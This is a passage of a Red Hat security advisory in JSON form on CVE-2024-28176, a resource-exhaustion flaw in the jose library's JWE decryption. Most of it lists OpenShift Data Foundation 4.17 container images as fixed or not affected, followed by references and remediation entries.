"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268820"
}
],
"notes": [
{
"category": "description",
"text": "Jose was found to have an uncontrolled resource consumption vulnerability. Under certain conditions, the user\u0027s environment can consume an unreasonable amount of CPU time or memory during JWE decryption operations, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jose: resource exhaustion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28176"
},
{
"category": "external",
"summary": "RHBZ#2268820",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268820"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28176"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28176",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28176"
},
{
"category": "external",
"summary": "https://github.com/panva/jose/security/advisories/GHSA-hhhv-q57g-882q",
"url": "https://github.com/panva/jose/security/advisories/GHSA-hhhv-q57g-882q"
}
],
"release_date": "2024-03-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
